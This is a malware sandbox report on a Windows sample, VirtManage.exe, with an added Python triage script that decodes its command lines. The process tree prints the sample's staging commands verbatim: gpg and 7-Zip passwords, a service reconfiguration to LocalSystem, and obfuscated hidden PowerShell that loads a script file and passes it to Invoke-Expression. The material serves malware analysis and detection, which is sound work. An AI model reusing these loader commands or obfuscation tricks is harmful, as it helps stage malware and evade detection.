Windows
Analysis Report
VirtManage.exe
Overview
General Information
Detection
Score: 46 (range 0 - 100), confidence: 100%
Compliance
Score: 33 (range 0 - 100)
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains a domain name check
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- VirtManage.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42)
- gpg.exe (PID: 7136 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- gpg.exe (PID: 6356 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 7za.exe (PID: 6516 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
- conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 6756 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- gpg.exe (PID: 6804 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- gpg.exe (PID: 5776 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 7za.exe (PID: 5692 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
- conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 6892 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 6156 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- conhost.exe (PID: 4172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- winapi.exe (PID: 3708 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe MD5: ADB9B72679B88DDE1749E0A438222156)
- powershell.exe (PID: 5372 cmdline: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- csc.exe (PID: 2928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0dxyzzew\0dxyzzew.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 4112 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C81.tmp" "c:\Users\user\AppData\Local\Temp\0dxyzzew\CSCE714EBFE583744818A7275BE9DF94CC1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- whoami.exe (PID: 5152 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
- svchost.exe (PID: 5776 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- SgrmBroker.exe (PID: 5692 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

- gpg.exe (PID: 6184 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)

- msiexec.exe (PID: 5308 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 2144 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7BA87831A94E96067AD1C39369AC7469 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
- WmiPrvSE.exe (PID: 6184 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)

- winapi.exe (PID: 6888 cmdline: "C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe" MD5: ADB9B72679B88DDE1749E0A438222156)
- powershell.exe (PID: 6328 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- csc.exe (PID: 996 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jvshszob.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 1796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1217.tmp" "c:\Users\user\AppData\Local\Temp\CSCC94B61069A254E398AE8B2B386E749A2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- whoami.exe (PID: 3488 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
- cleanup
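The process tree above records the whole staging chain in clear text: gpg.exe decrypts the .gpg blobs with the passphrase 12345678 passed on the command line, 7za unpacks the two archives with the passwords given as -p, msiexec installs RVTools.msi, sc reconfigures msdtc, and winapi.exe launches a hidden PowerShell stage that hands a file under C:\ProgramData to a WebClient and Invoke-Expression, after which csc.exe and whoami.exe run. The Python below is an added triage example and is not part of the Joe Sandbox report or of the sample: it runs a few command-line rules over entries copied from the tree, recovers the gpg and 7-Zip passphrases, joins the concatenated path literal, and resolves the wildcard member lookups ('*dl*t', '*nd*e', 'N*ct', 'D*g', *e-*press*) the way PowerShell's -like would, against constructed, partial member lists. The rule names, the candidate lists and the summarize() rendering are this example's own assumptions; only the command lines come from the report.

```python
import fnmatch
import re

# Constructed sample input: the command lines are copied from the process tree
# above (first PowerShell stage in full); nothing in this script executes them.
PS_CMD = (
    r'''powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');'''
    r'''Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)'''
    r'''.(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name)'''
    r'''.Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)'''
    r'''.PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);'''
    r'''Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);'''
    r'''.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"'''
)
PROCESS_TREE = [  # (image, command line)
    ("gpg.exe", r'C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes '
                r'--output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg'),
    ("7za.exe", r'C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z '
                r'-pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI'),
    ("msiexec.exe", r'msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi"'),
    ("sc.exe", 'sc config msdtc obj= "LocalSystem"'),
    ("winapi.exe", r'C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe'),
    ("powershell.exe", PS_CMD),
    ("csc.exe", r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                r'@"C:\Users\user\AppData\Local\Temp\0dxyzzew\0dxyzzew.cmdline"'),
    ("whoami.exe", r'"C:\Windows\system32\whoami.exe"'),
]
# Triage rules; the names are this example's own, not Joe Sandbox signature names.
RULES = [
    ("binary run from ProgramData", r'^"?C:\\ProgramData\\'),
    ("gpg decrypt with passphrase on the command line", r'gpg\.exe.*--passphrase\s+"?\S+"?.*--decrypt'),
    ("7-Zip extract of a password-protected archive", r'7za(\.exe)?"?\s+x\s.*\s-p\S+'),
    ("msiexec installing a package from ProgramData", r'msiexec\.exe\s+/i\s+"?C:\\ProgramData\\'),
    ("sc config: service account or start type changed", r'\bsc\s+config\s+\S+\s+(obj=|start=)'),
    ("powershell: hidden window with inline -command", r'powershell(\.exe)?.*-w(indowstyle)?\s+hidden.*-c(ommand)?\s'),
    ("powershell: string concatenation and wildcard member lookup", r"'\+'.*-[ci]?like\s*'[^']*\*[^']*'"),
    ("csc.exe compiling a response file from Temp", r'csc\.exe"?\s.*@"?[^"]*\\Temp\\'),
    ("whoami discovery", r'whoami\.exe'),
]

def triage(process_tree):
    """Return (image, rule name) for every rule that matches a command line."""
    return [(image, name) for image, cmd in process_tree
            for name, pattern in RULES if re.search(pattern, cmd, re.IGNORECASE)]

def extract_secrets(cmd):
    """Recover the passphrases gpg (--passphrase "...") and 7-Zip (-p...) are given."""
    found = {}
    for key, pattern in (("gpg_passphrase", r'--passphrase\s+"([^"]*)"'), ("7z_password", r'\s-p(\S+)')):
        m = re.search(pattern, cmd)
        if m:
            found[key] = m.group(1)
    return found

def join_concat(cmd):
    """Join the first $('a'+'b'+...) literal the way PowerShell's + operator does."""
    m = re.search(r"\$\(((?:'[^']*'\+?)+)\)", cmd)
    return "".join(re.findall(r"'([^']*)'", m.group(1))) if m else None

# Constructed, partial member lists standing in for what PowerShell would enumerate.
CMDLETS = ["New-Object", "New-Item", "Invoke-Expression", "Invoke-Command", "Get-Command", "Set-Variable"]
WEBCLIENT_METHODS = ["DownloadData", "DownloadFile", "DownloadString", "OpenRead", "UploadString", "Dispose"]
INVOKECOMMAND_METHODS = ["ExpandString", "GetCmdlet", "GetCommand", "GetCommandName", "InvokeScript", "NewScriptBlock"]
AUTOMATIC_VARS = ["ExecutionContext", "Error", "Host", "Input", "PSVersionTable"]
# (wildcard as it appears in PS_CMD, list it is resolved against, case-sensitive?)
LOOKUPS = [
    ("*uti*t", AUTOMATIC_VARS, False),          # Item Variable:\*uti*t (provider path, case-insensitive)
    ("*dl*t", INVOKECOMMAND_METHODS, True),     # -clike'*dl*t'
    ("*nd*e", INVOKECOMMAND_METHODS, True),     # -clike'*nd*e'
    ("N*ct", CMDLETS, False),                   # GetCommandName('N*ct',1,$TRUE)
    ("D*g", WEBCLIENT_METHODS, True),           # -clike'D*g'
    ("*e-*press*", CMDLETS, False),             # Get-Command *e-*press*
]

def like_match(name, pattern, case_sensitive):
    """PowerShell -clike / -ilike via fnmatch: same * and ? wildcards."""
    if not case_sensitive:
        name, pattern = name.lower(), pattern.lower()
    return fnmatch.fnmatchcase(name, pattern)

def resolve_lookups(cmd, lookups=LOOKUPS):
    """Map each wildcard present in cmd to the member it selects; a list means ambiguous."""
    resolved = {}
    for pattern, candidates, case_sensitive in lookups:
        if pattern in cmd:
            hits = [c for c in candidates if like_match(c, pattern, case_sensitive)]
            resolved[pattern] = hits[0] if len(hits) == 1 else hits
    return resolved

def summarize(cmd):
    """Render the first stage as the readable expression it evaluates to."""
    r = resolve_lookups(cmd)
    type_name = re.search(r"'([A-Za-z]+(?:\.[A-Za-z]+)+)'", cmd).group(1)  # 'Net.WebClient'
    return f"{r['*e-*press*']} (({r['N*ct']} {type_name}).{r['D*g']}('{join_concat(cmd)}'))"

if __name__ == "__main__":
    for image, name in triage(PROCESS_TREE):
        print(f"{image:16} {name}")
    print(summarize(PS_CMD))
```

-clike is case-sensitive and -ilike (like the Variable: provider path) is not, so the helper lowercases only for the insensitive form. On a real host the wildcards are matched against the full member list; the obfuscation depends on each pattern selecting exactly one name, which is why resolve_lookups reports a list rather than guessing when more than one candidate matches.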
No configs have been found
No yara matches
Sigma rule sources
- Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
- Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger